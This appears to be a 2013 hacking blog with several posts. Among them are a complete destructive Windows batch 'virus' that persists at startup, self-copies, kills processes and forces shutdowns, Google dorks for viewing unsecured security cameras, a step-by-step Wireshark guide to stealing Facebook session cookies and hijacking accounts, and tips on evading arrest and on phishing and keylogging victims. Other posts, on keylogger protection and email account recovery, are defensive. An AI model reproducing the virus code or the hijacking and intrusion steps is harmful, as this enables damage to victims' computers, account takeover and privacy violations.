Saturday, January 26, 2013

6:16:00 pm Posted by Unknown No comments Posted in ,
Hackers have defeated Google Chrome for the first time in an annual competition to test the security of the most popular web browser.

“We wanted to show that Chrome was not unbreakable. Last year, we saw a lot of headlines that no one could hack Chrome. We wanted to make sure it was the first to fall this year,” The Telegraph quoted firm’s research head Chaouki Bekrar, as saying.


Bekrar said his team had worked for six weeks ahead of the competition to explore vulnerabilities.
He added that his company had also devised a procedure to hack into Firefox and Internet Explorer, but wanted to first demonstrate that Chrome was not invincible.
Vupen had earlier used two previously unknown vulnerabilities to beat Chrome's security, which is perceived to be stronger than rivals Firefox and Internet Explorer because of its use of “sandboxing”.


Vupen said it would keep details of how it bypassed Google's sandbox technology private "for our customers".


Your bloggers KT,KK.
____----OUR HACK IS YOURS----____

Friday, January 25, 2013

3:37:00 pm Posted by Unknown No comments Posted in

Hacking Security Cameras:

There exists many security cameras that are used for monitoring places like parking lots, college campus, road traffic etc. With Google, it is possible to hack these cameras so that you can view the images captured by them in real time. For this, all you have to do is just use the following search query in Google. Type in the Google search box exactly as given below and hit enter:
inurl:”viewerframe?mode=motion”
Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls. You will see something as follows:
Hacking Live Camera
As you can see in the above screenshot, you now have access to the Live cameras which work in real-time. You can also move the cameras in all the four directions, perform actions such as zoom in and zoom out. This camera has really a less refresh rate. But there are other search queries through which you can gain access to other cameras which have faster refresh rates. In order to access them, just use the following search query:
intitle:”Live View / – AXIS”
Now, click on any of the search results to access a different set of live cameras. Thus, you have hacked Security Cameras using Google.
WARNING: This post is for educational purpose only don't use this for criminal purposes..
your bloggers KT&KK
____----OUR HACK IS YOURS----____

Wednesday, January 09, 2013

9:10:00 pm Posted by Unknown No comments Posted in
In this post i am going to give you dangerous virus code which is written in Batch Programming language.
 

Virus can do:
  • Copy itself into startup
  • Copy itself over one thousand times into random spots in your computer
  • Hide its self and all other created files
  • Task kill MSN, Norton, Windows Explorer, Limewire.
  • Swap the left mouse button with the right one
  • Opens alert boxes
  • Changes the time to 12:00 and shuts down the computer




  Here is the Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ). 

  Be careful..!! if you double click the batch file,then you are the victim of this virus
This is strictly for educational use only please don't misuse it.

Your bloggers KT,KK

____----Our hack is yours----____


8:18:00 pm Posted by Unknown No comments Posted in ,

How to survive as a hacker.



This article will show you some of the top ways the best hackers use to keep themselves hidden and out of jail and survive as a hacker,First of all i want to make one thing clear to all that this is not a site which exite hackers but this is developed to help innocent people not getting trapped by hackers,Most of hackers do not take care of the following things and get caught and result in troubling their selves and also their families so below are 15 tips to survive as a hacker,Educational purposes only,written for begineers






How to survive as a hacker - Tips




Never Disclose your Identity:
Never tell any body that you are a hacker even your friends or your relatives,you must keep it a secret

Use Proxy:
Never hack without a proxy

Be Careful:
Never let FBI enter your house without a search warrant.

Never Hack from your home:
Never hack from your home always use net cafe for these purposes

Always:
Wave to cops

Use Fake information:
Never use your real name in any sort of conversation or in any signup

Never keep weak passwords:
Do not keep a password which is already present in the dictionary or a password which is very common
etc your pet name,Your country name etc

Password tip:
Dont use same password twice for maximum security

Of course:
Never hack from the same computer twice if possible

Hide your Ip:
Hide your Ip address to avoid your chances of being traced,i have made a post on Hide your IP address

Use Firewall:
Always use a Good firewall such as zonealram

Change your Ip:
Change your Ip address daily if possible,I have wrote an article on How to change your Ip address

Use fake information while signing up:
Dont enter your personal information eg your address,your number etc while
Using social networking sites like orkut,Facebook etc

Most importantly:
Always have a panic button that mass deletes your questionable content

OF course:
Never let the FBI in period.

Yet again:
Always use a Proxy when doing anything remotely illegal

You must say to yourself that you do not follow one of these rules your chances of getting caught are high,This is why the most hackers are caught they forget to hide their identity,hope you liked the post.If you think that this article is worth kindly pass the comments



8:03:00 pm Posted by Unknown 2 comments Posted in ,

Your IP is exposed when ever you visit a website,when your IP gets exposed it becomes easy to trace you and find out your personal information,Hackers can use your IP to gain access to your personal files and documents and even can get into your pay pal, alert etc accounts,Hide the IP is a Software which masks your IP with one click and you can surf web anonymously,on the other hand Hackers can use this software to hide their identity and not get caught,its beneficial for all and i recommend that every PC should have this software installed.

Hide the IP to be the best one. 
It’s ease of usereliabilitywide range of optionsspeed and un matchable price were on top when compared to that of the remaining IP Hising softwares on the market.



Key Features of Hide the IP:



Hide IP Address »

 Single click to completely hide your Online Identity. Others will see a fake IP address masking your real IP, thus, protecting your privacy.

Select Your Physical IP Location »

You decide which country will be indicated as your origin by simply choosing from a country list. We have hundreds, hourly updated, IP addresses available for use.

Anonymous Web Surfing »

You are protected from hackers who will be tricked by your fake IP instead of your real. They will never be able to find any information about you by tracing the fake IP.
Send Anonymous E-mails » Hide your IP in E-mail headers. Be protected while sending emails from Yahoo!, Hotmail, GMail. Upgrading to Platinum Service add-on will protect you in Outlook!

Bypass Website Country Restrictions » 

Surf websites which are restricted for your country. Surf in forums on which you were banned.



Supports Internet Explorer, Firefox, Google Chrome, Safari, Opera.
So what are you waiting for? Download the free trial and test Hide the IP on your computer now! For more information on Hide the IP visit the following link.

Hide the IP

5:35:00 pm Posted by Unknown 3 comments Posted in


Facebook Cookie Stealing And Session Hijacking


Three days ago I finished the series on Gmail Session Hijacking and Cookie Stealing , due to a tremendous response of readers I planned to write a post on Facebook cookie stealing and Session hijacking. Facebook session hijacking can also be accomplished via a very popular tool called Firesheep(On a Wifi Network Only), which I won't be explaining here because I have already written it before in my post Facebook Hacking Made Easy With Firesheep

In this tutorial I will explain you how an attacker can capture your authentication cookies on a local area network and use them to hack your facebook account,  Before reading this tutorial I would recommend you to  part1, part2 and part 3 of my Gmail Session Hijacking and Cookie stealing series, So you could have better understanding of what I am doing here.

Facebook Authentication Cookies

The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

How To Steal Facebook Session Cookies And Hijack An Account? 


An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.


If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.


In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.


Step 1 - First of all download wireshark from the official website and install it.


Step 2 - Next open up wireshark click on analyze and then click on interfaces.


Step 3 - Next choose the appropriate interface and click on start.




Step 4 - Continue sniffing for around 10 minutes.


Step 5 - After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.


Step 6 - Next set the filter to http.cookie contains “datr” at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.




Step 7 -  Next right click on it and goto Copy - Bytes - Printable Text only.




Step 8 - Next you’ll want to open up firefox. You’ll need both Greasemonkey and thecookieinjector script. Now open up Facebook.com and make sure that you are not logged in.


Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.




Step 10 - Now refresh your page and viola you are logged in to the victims facebook account.
5:23:00 pm Posted by Unknown No comments Posted in
It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out.

In this post, you will find the best possible ways to get back your hacked email account.

For Gmail:

It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.
Step-1: Try resetting your password! This is the first step and probably the easiest way to get your account back in action. In this process, Google may ask you to answer the secret question or may send the password reset details to the secondary email address associated with your compromised account. You can reset you password from the following link
Update:
Gmail has now introduced a new feature wherein it is possible to reset your password using your mobile number. Once the reset process is initiated, Gmail will send new login details to your mobile number itself.
If you cannot find success from the Step-1, then proceed to Step-2.
Step-2: Many times the hacker will change the secret question and the secondary email address right after the account is compromised. This is the reason for the password reset process to fail. If this is the case, then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like:
  1. Email addresses of up to five frequently emailed contacts
  2. Names of any 4 Labels that you may have created in your account
  3. List of other services associated with your compromised account
  4. Your last successful login date
  5. Account created date
  6. Last password that you remember and many more…
You need to fill out this form as much accurately as possible. It is obvious to forget the dates of last login, account creation and similar terms. However, you need to figure out the closest possible date/answers and fill out this form. This is your last chance!
The more accurate the information filled out in the recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link

For Yahoo and Hotmail:

Unfortunately, for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions that you have setup or reset the password using the secondary email option.
To initiate the password reset process just click on the Forgot password link in your login page and proceed as per the screen instructions.
I hope this post will help you recover the lost account. I highly recommend that you also read my post on How to protect your email account from being hacked and Tips to find unauthorized activity on your Gmail account so that you always stay protected
!
5:18:00 pm Posted by Unknown No comments Posted in
Hacking facebook

In my previous post How to hack facebook password i told you about hacking facebook with phishing,Today i thought to uncover all the methods used to hack facebook password,



I will cover 4 methods over here:


1. Facebook Phishing

2. Keylogging
3. Social engineering
4. Primary email address hack

1.Facebook phishing:



I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article How to hack facebook password

2.Keylogging:




This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password. I have posted detailed information of top keyloggers in the trade for more information see my password hacking softwares section


3. Social engineering:


This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on Facebook and i got his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.


4.Primary email address hack 

4:56:00 pm Posted by Unknown No comments Posted in , ,












eyloggers have been a major problem today as it does not require any prior knowledge of computers to use it. So, it is often used by hackers to steal passwords, credit card numbers and other confidential data from your computer. Below are some methods through which you can protect your computer from key loggers:


1. Use a Good Antivirus

This is the first and the basic step that you need to take in order to protect your computer from key loggers and other online threats. Use a good antivirus such as Kaspersky, Norton or McAfee and update it regularly.

2. Use a Good Anti spyware

If you are a frequent Internet user, then you could be exposed to a number of spywares on a regular basis. Since key logger is basically a spyware, it is better to install a good antispyware program. Make sure that the antivirus and the anti spyware you use do not conflict with each other.

3. Anti logger can be Handy

Anti loggers are the programs that detect the presence of key loggers on a given computer. Over the past few years, I have tested a lot of anti-logging programs and have found Zemana Antilogger as the best one.
Normally, a key logger can easily be detected by a good antivirus program, but hackers may use some methods such as hexing, binding or encrypting to make it harder for the antivirus program to detect it. In this case, Zemana Antilogger comes handy as this program is specially designed to protect your PC against harmful key loggers.
Zemana Antilogger

4. Online Scanning

When ever you receive a suspicious file, you scan it with online scanners such as Multi engine antivirus scanner which scans your file with 24 popular antivirus engines and reports it back to you if the file is recognized as a virus or spyware. This ensures that none of the malicious programs can escape from being detected as there are 24 different antivirus engines involved in the scanning process.

5. Use Sandboxie

Sandboxie is another great program to help you protect your computer against harmful keyloggers and spywares. Sandboxie runs your computer in an isolated space which prevents your program from making permanent changes to other programs in your computer.
When ever you receive a file that looks suspicious, just run the program with Sandboxie so that, you can test it without the risk of making permanent changes to your computer.
Sandboxie
To run a program in Sandboxie, follow the steps as mentioned below:
  1. Open the Sandboxie tool and click on sandbox menu on the top.
  2. Now go to Default sandbox.
  3. Then click on run any program.
  4. Now select the file you wish to run in sandboxie and click open.

6. Key scrambler

Keyscrambler is one of the best program that offers protection against keyloggers. It is a small program which encrypts your keystrokes so that, even if your computer has a keylogger installed on it, only the encrypted keystrokes are captured by the keylogger and not the actual ones.
The free version of Keyscrambler currently supports Firefox, IE and a few other applications. However it’s premium version supports more than 160 applications.
Hope you liked my post! Pass the comments.
This is a guest post by Rafay Baloch who is an 18 year computer engineering student who blogs at: Rafay Hacking Articles. He is also the writer of the book: “A Beginners Guide To Ethical Hacking“.

Follow these instructions and get maximum security also share this to your friends to whom you want to be safe...

Recent in Sports

Search